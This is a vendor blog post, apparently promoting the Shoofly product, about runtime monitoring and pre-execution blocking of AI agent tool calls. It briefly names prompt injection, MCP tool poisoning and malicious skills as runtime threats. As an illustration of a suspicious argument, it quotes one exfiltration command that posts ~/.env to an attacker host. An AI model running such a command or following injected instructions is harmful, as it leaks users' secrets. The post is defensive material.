When developers talk about securing AI agents, they often reach for familiar concepts: input validation, output filtering, audit logging. These tools come from the web application security playbook, and they're well-understood. The problem is that AI agents don't follow the same rules as web apps. The threat surface is different. The attack timing is different. And the security layer that actually matters — runtime threat detection — is one most teams haven't thought carefully about yet.
This post lays out what runtime means in the context of agentic systems, why static analysis falls short, and what good AI agent threat detection looks like in practice.
What "Runtime" Actually Means for AI Agents
In traditional software security, "runtime" usually refers to the execution environment — the JVM, the Node process, whatever's running your code. Runtime protection means watching that environment for anomalies: memory exploits, process injection, unexpected syscalls.
For AI agents, runtime has a sharper definition. An agent operates in a loop: it receives context, reasons over it, selects a tool, and fires a call with arguments. That sequence — model output → tool invocation → execution — is the agent runtime. Every meaningful action an agent takes passes through this loop. Every tool call is a runtime event.
And here's the key thing: there is no static equivalent to a tool call. You can inspect an agent's code before it runs. You can audit the list of tools it has access to. You can review its system prompt. None of that tells you what the agent will actually do when it encounters a live document, a live API response, or a live instruction injected into its context at execution time. The behavior is determined at runtime, and it can only be observed at runtime.
Three Layers of Agent Security: Static Analysis, Runtime Detection, Pre-Execution Blocking
Most security tools in the agentic AI space operate at one of three layers. Understanding the difference matters when you're deciding how much protection you actually have.
Static analysis examines agent configuration, tool definitions, and code before anything runs. It's useful for catching misconfigurations — tools with overly broad permissions, prompts that expose sensitive instructions, dependency issues. But static analysis is fundamentally blind to runtime-injected threats. A poisoned MCP tool response, a prompt injection embedded in a webpage the agent summarizes, a dynamically loaded skill with malicious instructions — none of these exist at static analysis time. They only exist when the agent is running and processing live data. Static analysis gives you a clean bill of health for the agent you configured, not the agent you deployed into a live environment.
Runtime detection watches what the agent does as it does it — logging tool calls, inspecting arguments, surfacing anomalies — this is the core of AI agent threat detection. This is the layer where agentic AI monitoring lives. It's a meaningful improvement over static analysis because it can observe behavior that only materializes at execution time. It can catch patterns: an agent that never sends outbound requests suddenly trying to exfiltrate data, or a tool being called with arguments that look nothing like normal usage. Detection at this layer gives you visibility. What it doesn't give you is prevention. By the time you've detected the anomaly, the tool call has already fired.
Pre-execution blocking is the third layer — and the one that actually stops damage. Rather than observing what happened, it intercepts the tool call synchronously before it executes. The policy evaluation happens at the hook layer, between the model's decision and the runtime's execution. If the call violates policy, it never fires. This is the architecture that makes prevention possible rather than just faster incident response.
Why Runtime Is the Minimum Bar for Agentic Systems
Static analysis is a useful baseline, but it's not enough on its own — and in agentic systems, relying on it as your primary security layer is a meaningful risk.
The threat vectors that matter most for agents are all runtime phenomena. Prompt injection doesn't live in your agent's code; it lives in the documents, web pages, and API responses your agent processes at execution time. MCP tool poisoning works by delivering malicious instructions through a tool's response at runtime — the tool definition looks clean at static analysis time. Dynamically loaded skills or plugins may not even exist when you do your pre-deployment audit. The attack surface for agentic systems is fundamentally a runtime surface.
This is why real-time agent security isn't a nice-to-have; it's the baseline. If you're running AI agents in production without runtime monitoring, you're flying blind. You won't know what your agent did with a malicious instruction until after the fact — if you find out at all. Production-grade agentic systems need runtime coverage as the minimum requirement, with pre-execution blocking as the target.
There's also an operational dimension. Agents operating on production systems — reading files, running commands, making API calls — can cause irreversible damage. Deleted files, exfiltrated credentials, corrupted databases. Detection after the fact means your incident report is detailed. It doesn't mean your data is safe. The case for blocking over detection comes down to this: the only damage you can truly prevent is damage that never happens.
What Good Tool Call Monitoring Looks Like
Tool call monitoring is the practical implementation of runtime detection for agents. Every tool call has three observable properties: the tool name, the arguments passed, and the context in which the call was made. Good monitoring captures all three and evaluates them against a coherent threat model.
Concretely, that means:
Tool-level visibility. You need to know which tools fired, not just that
the agent ran. "Agent completed task" is not useful security telemetry. "Agent called
write_file with path /etc/hosts and content containing a redirect"
is. Good monitoring is granular at the tool call level.
Argument inspection. Tool names alone aren't enough. An agent calling
shell_exec with ls -la is very different from one calling it
with curl https://attacker.com/exfil -d @~/.env. Monitoring that doesn't
inspect arguments is missing most of the signal.
Policy-based evaluation. Raw logs are better than nothing, but effective monitoring evaluates each call against a defined policy. What tools are allowed? What argument patterns are suspicious? What constitutes a violation? Policy-based evaluation turns a stream of events into a stream of verdicts — and those verdicts can drive alerting or, with the right architecture, blocking.
Alert fidelity. Monitoring that generates too many false positives gets ignored. Good tool call monitoring is tuned to the agent's normal behavior, so that when something genuinely anomalous happens, the alert is signal rather than noise.
For teams wanting a hands-on implementation path, the Shoofly guides walk through setting up runtime monitoring and policy configuration step by step.
Shoofly's Approach: From Detection to Blocking
Shoofly is built around the premise that detection is necessary but not sufficient. The product is structured as two tiers, each representing a different security posture.
Shoofly Basic is free. It provides runtime detection and alerting — every tool call is monitored, evaluated against a threat policy, and surfaced if it looks suspicious. The threat policy is open and auditable: you can read exactly what rules Shoofly is enforcing and modify them to fit your environment. This is the runtime detection layer. It gives you visibility into what your agents are doing and alerts when something looks wrong.
Shoofly Advanced upgrades detection to full pre-execution blocking. The architecture shifts from observe-and-alert to intercept-and-halt. When a tool call hits the hook layer, it's evaluated synchronously against policy. If it's clean, it fires. If it violates policy, it doesn't — not after a delay, not pending review, but immediately and completely. The call never reaches the runtime. Advanced also adds real-time alerts via Telegram and desktop notifications, and policy linting to help you write rules that work. See pricing details.
The distinction matters for your threat model. If your agents have read-only access and the blast radius of a compromise is limited, detection may be sufficient — you get visibility, you can investigate, you can remediate. If your agents can write files, run commands, make API calls, or handle credentials, the window between "threat detected" and "damage done" may be zero. Pre-execution blocking is the only way to close that window. That architecture is available for OpenClaw-hosted agents today.
The goal isn't perfect prediction of what an agent might do. It's a gate that evaluates what it's actually about to do — and stops it if the answer is wrong.
Add runtime security for Claude Code and OpenClaw agents:
curl -fsSL https://shoofly.dev/install.sh | bashRelated reading: Agentic AI Security · Why We Block Instead of Detect · MCP Tool Poisoning · OpenClaw Security